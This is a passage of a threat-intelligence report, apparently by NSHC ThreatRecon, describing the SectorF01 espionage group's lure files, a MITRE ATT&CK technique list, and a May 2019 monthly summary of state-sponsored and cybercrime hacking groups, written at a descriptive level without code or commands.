There is one malware that the SectorF01 group used in January 2019 to attack specific targets using the “DLL Side-Loading” technique. The file name of the malware used in this attack is “Ho so dang ky lam dai ly uy quyen chinh thuc cua Huyndai – Thanh Cong – Nguyen Thi Mai Phuong.exe”. “Huyndai” in the file name is likely to be a typo of “Hyundai”. “Hyundai – Thanh Cong (Hyundai Thành Công)” is a joint venture established by a South Korean automobile company in cooperation with a large Vietnamese company.

Malware distributed using the subject of “Huyndai [sic] – Thanh Cong”
“HYUNDAI THANH CONG” Website

Both “wwlib.dll” and the following normal document are executed, causing the user to believe that the document is executed as per normal, without loading any executable file.

Normal document executed by “wwlib.dll”

Lure 2 – Cambodia National Rescue Party in Republic of Korea

There is a malicious document called “FW Report on demonstration of former CNRP in Republic of Korea.doc” that the SectorF01 group used to attack using “CVE-2017-11882” vulnerability in July 2018. “CNRP” in the file name is likely to be an abbreviation of “Cambodia National Rescue Party”, and there are many supporters of the Cambodia National Rescue Party (CNRP) in South Korea. Indeed, in April 2019, thousands of CNRP supporters gathered in Gwangju, South Korea, to protest the liberation of democracy in Cambodia.

“CNRP” supporters’ demonstrations in Gwangju,Korea, The Phnom Penh Post

When executing the document, the malware is executed by the vulnerability “CVE-2017-11882”. The following screen is displayed when the document is viewed.

“FW Report on demonstration of former CNRP in Republic of Korea.doc” document

Lure 3 – KoreanTimesSSK Font

The SectorF01 group attacked using fonts as lure subjects and pretends to be a font management program or font file. They seem to utilize font-related programs in attacks because most of the countries that the group attacks have a non-English native language and they have to use various fonts accordingly. The SectorF01 group used a file disguised as a Korean font in June 2017, and the “KoreanTimesSSK” font used in the attack was a Korean font created by Southern Software.

Conclusion

We have traced the SectorF01 group, which has been steadily conducting cyber espionage activities in Southeast Asia for the past seven years, and examined their initial penetration methods. They conduct hacking activities against neighboring countries and opposition forces in order to maintain their own regime and economic profit. It is likely that it is hacking at the national level for the benefit of the state and recently also hacking other industries such as the automobile industries of more advanced countries to contribute to the industrial development of their own country. These attacks are spreading to the East Asian region, which is a huge threat to the neighboring countries as well as to the national institutions.

The scope of activities and number of malware that the group uses every year for attacks is increasing, and we need to understand them more and prepare for their attacks. We should be prepared to effectively detect and respond to their attacks through steady threat hunting and intelligence activities.

Indicators of Compromise

The IOCs containing the malware hashes (827 total) that the SectorF01 group used from 2013 until end of the June 2019 for cyber espionage can be found here.

More information about the SectorF01 group is available to customers of ThreatRecon Intelligence Service (RA.global@nshc.net).

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

Drive-by Compromise
Exploit Public-Facing Application
Spearphishing Attachment
Spearphishing Link
Valid Accounts

Execution

Command-Line Interface
Compiled HTML File
Control Panel Items
Execution through API
Execution through Module Load
Exploitation for Client Execution
Mshta
PowerShell
Regsvr32
Rundll32
Scheduled Task
Scripting
Service Execution
Signed Script Proxy Execution
Trusted Developer Utilities
User Execution
Windows Management Instrumentation

Persistence

Component Object Model Hijacking
DLL Search Order Hijacking
Hidden Files and Directories
Modify Existing Service
New Service
Office Application Startup
Registry Run Keys / Startup Folder
Scheduled Task
Valid Accounts
Web Shell

Privilege Escalation

Bypass User Account Control
DLL Search Order Hijacking
Exploitation for Privilege Escalation
New Service
Process Injection
Scheduled Task
Valid Accounts
Web Shell

Defense Evasion

Binary Padding
Bypass User Account Control
Compiled HTML File
Component Object Model Hijacking
Control Panel Items
Deobfuscate/Decode Files or Information
DLL Search Order Hijacking
DLL Side-Loading
File Deletion
File Permissions Modification
Hidden Files and Directories
Indicator Removal on Host
Masquerading
Modify Registry
Mshta
NTFS File Attributes
Obfuscated Files or Information
Process Injection
Regsvr32
Rundll32
Scripting
Signed Script Proxy Execution
Software Packing
Template Injection
Timestomp
Trusted Developer Utilities
Valid Accounts
Virtualization/Sandbox Evasion
Web Service

Credential Access

Credential Dumping
Input Capture
Network Sniffing

Discovery

Account Discovery
File and Directory Discovery
Network Service Scanning
Network Sniffing
Process Discovery
Query Registry
Remote System Discovery
System Information Discovery
System Network Configuration Discovery
System Network Connections Discovery
System Owner/User Discovery
Virtualization/Sandbox Evasion

Lateral Movement

Application Deployment Software
Distributed Component Object Model
Exploitation of Remote Services
Pass the Hash
Pass the Ticket
Remote File Copy
Windows Admin Shares

Collection

Automated Collection
Data from Local System
Input Capture
Man in the Browser
Screen Capture

Command and Control

Commonly Used Port
Custom Command and Control Protocol
Data Encoding
Data Obfuscation
Domain Generation Algorithms
Multi-Stage Channels
Multiband Communication
Remote File Copy
Standard Application Layer Protocol
Uncommonly Used Port
Web Service

Exfiltration

Data Compressed
Data Encrypted
Exfiltration Over Alternative Protocol
Exfiltration Over Command and Control Channel

Impact

Transmitted Data Manipulation

Monthly Threat Actor Group Intelligence Report, May 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from April 21 to May 20, 2019.

1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA02, SectorA05 and SectorA07 were found among SectorA hacking groups this May. Analysis of the hacking campaigns of SectorA groups over a long period of time reveals that SectorA02, SectorA05 and the newly defined SectorA07 are the most active. The increase in activity of these three groups means that the strategy, hacking purpose and direction of the entire SectorA groups are clarified. In addition, it means that the goals of each group in SectorA is now clear.

In the past, SectorA02 and Sector05 groups conducted hacking campaigns to collect advanced information related to Korea. However, these groups are currently conducting hacking campaigns to gather information on political activities in Europe, North America, and Southeast Asia, where countries that can influence the political and diplomatic activities of the SectorA government are located.

In May, the newly defined SectorA07 group was a small subgroup of the larger existing SectorA05 group. As a result of analyzing their hacking campaigns, we found that the SectorA07 group is active only for the purpose of collecting financial information from companies located in countries such as South Korea and Southeast Asia.

The SectorA02 group uses the most diverse hacking strategies and techniques in SectorA. They develop and utilize a variety of hacking strategies and techniques such as simple phishing attacks, spear phishing attacks with malware, and sophisticated social engineering techniques using KakaoTalk (a popular messenger in South Korea). On the other hand, SectorA05 and SectorA07 focused on utilizing spear phishing, which was used frequently in the past, for initial access. They use Microsoft Word or HWP file format malware selectively depending on their target victim.

We observe that SectorA is targeting specific countries less and now gathering political and economic activity information of various countries related to the SectorA government and capturing financial information in a variety of non-specific countries and regions.

2. SectorB Activity Features

SectorB groups are conducting campaigns in various countries around the world. In May, a total of four hacking groups were found to be active in SectorB.

In the Middle East and Southeast Asia, the activity of SectorB01 which had a low activity frequency over the past period has started to increase. The SectorB01 group used Microsoft Word files containing code execution vulnerabilities to execute malware. These files were attached to their spear phishing emails, and this technique was frequently used by other SectorB groups in the past. In May, the SectorB01 group was also found using malware that runs on the Linux operating system and it seems they are preparing their capabilities for attacks on various operating systems.

The SectorB03 group, mainly acting in North America, used the remote code execution vulnerability CVE-2019-0604 to attack Microsoft SharePoint servers, which was not used by other hacking groups in the past. They attempted to exploit the vulnerability in order to penetrate the internal network by uploading a WebShell to the target server.

SectorB09 group mainly operates in East Asia, and they use malware with characteristics similar to those used in the past. However, they are using a new hacking technique as they are masquerading their malware as a setup file of a commercial cloud service and then distributing malware to specific targets.

The SectorB16 group, acting mainly in Europe and Southeast Asia, uses only open source tools and known existing vulnerabilities. This characteristics make it more difficult to detect their hacking activity.

SectorB groups are likely to conduct hacking activities to seize relevant diplomatic information as part of a recent trade war with the United States. As a result, the frequency of SectorB group hacking campaigns is expected to increase.

3. SectorC Activity Features

In May, a total of three hacking groups were found among the SectorC groups. They perform hacking activities mainly in Europe, South America, and Eastern Europe where political friction is frequent.

The SectorC01 group mainly utilized malware recently produced in the GO language for this month. This seems to be a strategic choice because the GO programming language has heterogeneous portability and high utilization.

The SectorC02 group installs information-collecting malware which targets Microsoft Exchange Servers. This is similar to malware used in hacking campaigns in countries located in Europe in the past, and seems to be aimed at stealing e-mail information that can be used for various purposes.

The SectorC08 group conducts intensive hacking activities targeting countries in Eastern Europe where political friction continues. The malicious code found in May was in the form of an executable compressed file, 7ZipSFX, which has the characteristics of using both script files and known normal files together. This is similar to the activities of the SectorC08 group found in the past.

4. SectorD Activity Features

In May, a total of two hacking groups were found among SectorD groups. They perform hacking activities mainly on other Middle Eastern countries which they have political tensions with.

The SectorD01 group mainly conducted hacking activities for the purpose of collecting information using spear phishing emails with Microsoft Excel files that contain malicious macros, and malware using AutoHotKey and TeamViewer, both of which they have not used in the past.

The SectorD02 group also conducted hacking campaigns in the Middle East. They used spear phishing with malware for initial access, just like most other Sector groups. Recently, they used open-source penetration testing tools in their attacks, which seems to be an attempt to not leave traces of attack activity.

5. SectorE Activity Features

In May, a total of three hacking groups were found among SectorE groups. They perform hacking activities mainly against their rival countries in Central Asian, including Pakistan.

The SectorE02 group typically used spear phishing emails with an attached Microsoft Excel document with malicious macro scripts for initial access.

The SectorE05 group also used Microsoft Word malware for hacking activities, with the internals of these Word files including two files with OLE structures and two files with executable file structures.

Hacking campaigns of SectorE hacking groups have been concentrated against their competitor countries after a military physical conflict with a political rival country. Due to this political situation, the hacking campaigns of SectorE groups are expected to continue.

6. SectorF Activity Features

In May, the SectorF01 group mainly operated against China, Thailand, Cambodia and India. In addition, hacking campaigns targeting Japan automotive companies located in Southeast Asia were also found.

The SectorF01 group uses a variety of attack methods constantly: executable files disguised as document file icons, MS Word documents containing VBA macro scripts, RTF files exploiting the CVE-2017-11882 vulnerability, and WinRAR ACE Vulnerability (CVE-2018-20250). Recent hacking activities of the SectorF01 group seems to be for different purposes from the past, as they now also hack various countries and organizations for the economic development of their own country as opposed to only for political and military information.

This type of hacking activity is similar to previous attempts of another sector, SectorB, to collect technology information of Western countries in order advance their own technology and economic development. It appears that the SectorF01 group will continue to target various advanced countries and high technology industries for these purposes.

7. Cyber Crime Groups Activity Features

Hacking groups included as part of SectorJ are those that perform high profile cyber crime activities to seize financial information that can generate an economic profit. In May, a total of two hacking groups were found among these Cyber Crime Groups and their hacking activities were found over a wide range of areas.

The hacking activities of the SectorJ04 group were mainly found in Italy, Korea, Romania, South Africa and India, and are targeted at major companies in the financial industry such as banks. The group mainly uses malware in the form of an MS Excel file containing macros script and they are using different malware and strategies across Europe and Asia.

The SectorJ09 group hacking activities observed were for hijacking credit card payment information for e-commerce platforms used in online stores in North America and universities in the US and Canada.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.